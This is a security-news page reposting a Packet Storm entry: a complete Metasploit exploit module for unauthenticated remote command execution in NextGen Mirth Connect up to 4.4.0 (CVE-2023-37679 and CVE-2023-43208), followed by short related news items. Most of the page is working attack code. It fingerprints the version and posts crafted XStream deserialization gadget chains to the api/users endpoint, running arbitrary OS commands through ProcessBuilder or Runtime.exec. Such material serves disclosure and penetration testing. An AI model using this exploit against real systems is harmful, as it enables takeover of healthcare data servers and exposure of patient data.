Security
Headlines
HeadlinesLatestCVEs

Headline

Mirth Connect 4.4.0 Remote Command Execution

A vulnerability exists within Mirth Connect due to its mishandling of deserialized data. This vulnerability can be leveraged by an attacker using a crafted HTTP request to execute OS commands within the context of the target application. The original vulnerability was identified by IHTeam and assigned CVE-2023-37679. Later, researchers from Horizon3.ai determined the patch to be incomplete and published a gadget chain which bypassed the deny list that the original had implemented. This second vulnerability was assigned CVE-2023-43208 and was patched in Mirth Connect version 4.4.1. This Metasploit module has been tested on versions 4.1.1, 4.3.0 and 4.4.0.

Packet Storm
#vulnerability#windows#linux#apache#git#java#rce#xpath#auth#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Mirth Connect Deserialization RCE',        'Description' => %q{          A vulnerability exists within Mirth Connect due to its mishandling of deserialized data. This vulnerability          can be leveraged by an attacker using a crafted HTTP request to execute OS commands within the context of the          target application. The original vulnerability was identified by IHTeam and assigned CVE-2023-37679. Later,          researchers from Horizon3.ai determined the patch to be incomplete and published a gadget chain which bypassed          the deny list that the original had implemented. This second vulnerability was assigned CVE-2023-43208 and was          patched in Mirth Connect version 4.4.1. This module has been tested on versions 4.1.1, 4.3.0 and 4.4.0.        },        'Author' => [          'r00t',          'Naveen Sunkavally',          'Spencer McIntyre'        ],        'References' => [          ['CVE', '2023-37679'],          ['URL', 'https://www.ihteam.net/advisory/mirth-connect/'],          ['CVE', '2023-43208'],          ['URL', 'https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/'],          ['URL', 'https://www.horizon3.ai/writeup-for-cve-2023-43208-nextgen-mirth-connect-pre-auth-rce/'],        ],        'DisclosureDate' => '2023-10-25',        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux', 'win'],        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Targets' => [          [            'Unix Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Payload' => { 'Space' => 8191, 'DisableNops' => true }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8443,          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def check    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    )    return CheckCode::Unknown('HTTP fingerprinting failed.') if res.nil?    unless res.get_html_document&.xpath('//head/title')&.first&.text =~ /Mirth Connect/      return CheckCode::Safe('The target is not Mirth Connect.')    end    target_version = get_target_version    return CheckCode::Detected('Failed to detect the target version.') unless target_version    vprint_status("Detected target version: #{target_version}")    if target_version <= Rex::Version.new('4.3.0')      return CheckCode::Appears("Version #{target_version} is affected by CVE-2023-37679.")    elsif target_version <= Rex::Version.new('4.4.0')      return CheckCode::Appears("Version #{target_version} is affected by CVE-2023-43208.")    end    CheckCode::Safe("Version #{target_version} is not affected.")  end  def get_target_version    return @target_version if @target_version    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'api/server/version'),      'headers' => {        'X-Requested-With' => 'OpenAPI'      }    )    return nil unless res&.code == 200    return nil unless res.body =~ /(\d+(\.\d+)*)/    @target_version = Rex::Version.new(Regexp.last_match(1))    @target_version  end  def exploit    target_version = get_target_version    print_status("Executing #{payload_instance.refname} (#{target.name})")    if target_version <= Rex::Version.new('4.3.0')      # The CVE-2023-43208 gadget chain will also work here but use the old one to verify the original vulnerability      # which did not implement the deny-list logic that was bypassed by the newer chain      res = execute_command_cve_2023_37679(payload.encoded)    elsif target_version <= Rex::Version.new('4.4.0')      res = execute_command_cve_2023_43208(payload.encoded)    else      fail_with(Failure::NoTarget, "Version #{target_version} is not vulnerable.")    end    if res.nil?      fail_with(Failure::Unreachable, 'Failed to execute the payload.')    elsif res.code != 500      fail_with(Failure::UnexpectedReply, 'Failed to execute the payload.')    end    print_good('The target appears to have executed the payload.')  end  def execute_command_cve_2023_37679(cmd, _opts = {})    # Tested on 4.1.1 and 4.3.0    xml = Nokogiri::XML(<<-XML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)      <sorted-set>        <string>#{rand_text_alphanumeric(4..12)}</string>        <dynamic-proxy>          <interface>java.lang.Comparable</interface>          <handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">            <target class="java.lang.ProcessBuilder">              <command>                <string>#{target['Platform'] == 'win' ? 'cmd.exe' : 'sh'}</string>                <string>#{target['Platform'] == 'win' ? '/c' : '-c'}</string>                <string>#{cmd.encode(xml: :text)}</string>              </command>            </target>            <methodName>start</methodName>            <eventTypes/>          </handler>        </dynamic-proxy>      </sorted-set>    XML    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api/users'),      'ctype' => 'application/xml',      'headers' => {        'X-Requested-With' => 'OpenAPI'      },      'data' => xml    })    res  end  def execute_command_cve_2023_43208(cmd, _opts = {})    if target['Platform'] == 'win'      cmd = "cmd.exe /c \"#{cmd}\""    else      # see: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html      cmd = "sh -c $@|sh . echo #{cmd}"    end    # Tested on 4.1.1, 4.4.0    xml = Nokogiri::XML(<<-XML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)      <sorted-set>        <string>#{rand_text_alphanumeric(4..12)}</string>        <dynamic-proxy>          <interface>java.lang.Comparable</interface>          <handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">            <target class="org.apache.commons.collections4.functors.ChainedTransformer">              <iTransformers>                <org.apache.commons.collections4.functors.ConstantTransformer>                  <iConstant class="java-class">java.lang.Runtime</iConstant>                </org.apache.commons.collections4.functors.ConstantTransformer>                <org.apache.commons.collections4.functors.InvokerTransformer>                  <iMethodName>getMethod</iMethodName>                  <iParamTypes>                    <java-class>java.lang.String</java-class>                    <java-class>[Ljava.lang.Class;</java-class>                  </iParamTypes>                  <iArgs>                    <string>getRuntime</string>                    <java-class-array/>                  </iArgs>                </org.apache.commons.collections4.functors.InvokerTransformer>                <org.apache.commons.collections4.functors.InvokerTransformer>                  <iMethodName>invoke</iMethodName>                  <iParamTypes>                    <java-class>java.lang.Object</java-class>                    <java-class>[Ljava.lang.Object;</java-class>                  </iParamTypes>                  <iArgs>                    <null/>                    <object-array/>                  </iArgs>                </org.apache.commons.collections4.functors.InvokerTransformer>                <org.apache.commons.collections4.functors.InvokerTransformer>                  <iMethodName>exec</iMethodName>                  <iParamTypes>                    <java-class>java.lang.String</java-class>                  </iParamTypes>                  <iArgs>                    <string>#{cmd.encode(xml: :text)}</string>                  </iArgs>                </org.apache.commons.collections4.functors.InvokerTransformer>              </iTransformers>            </target>            <methodName>transform</methodName>            <eventTypes>              <string>compareTo</string>            </eventTypes>          </handler>        </dynamic-proxy>      </sorted-set>    XML    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api/users'),      'ctype' => 'application/xml',      'headers' => {        'X-Requested-With' => 'OpenAPI'      },      'data' => xml    })    res  endend

Related news

CVE-2023-43208: NextGen Mirth Connect Remote Code Execution Vulnerability (CVE-2023-43208)

NextGen Healthcare Mirth Connect before version 4.4.1 is vulnerable to unauthenticated remote code execution. This is a bypass of the patch put in for CVE-2023-37679.

CVE-2023-43208: NextGen Mirth Connect Remote Code Execution Vulnerability (CVE-2023-43208)

NextGen Healthcare Mirth Connect before version 4.4.1 is vulnerable to unauthenticated remote code execution. This is a bypass of the patch put in for CVE-2023-37679.

Critical Flaw in NextGen's Mirth Connect Could Expose Healthcare Data

Users of Mirth Connect, an open-source data integration platform from NextGen HealthCare, are being urged to update to the latest version following the discovery of an unauthenticated remote code execution vulnerability. Tracked as CVE-2023-43208, the vulnerability has been addressed in version 4.4.1 released on October 6, 2023. "This is an easily exploitable, unauthenticated remote code

Critical Flaw in NextGen's Mirth Connect Could Expose Healthcare Data

Users of Mirth Connect, an open-source data integration platform from NextGen HealthCare, are being urged to update to the latest version following the discovery of an unauthenticated remote code execution vulnerability. Tracked as CVE-2023-43208, the vulnerability has been addressed in version 4.4.1 released on October 6, 2023. "This is an easily exploitable, unauthenticated remote code

CVE-2023-37679: NextGen Healthcare

A remote command execution (RCE) vulnerability in NextGen Mirth Connect v4.3.0 allows attackers to execute arbitrary commands on the hosting server.

Packet Storm: Latest News

Red Hat Security Advisory 2024-8690-03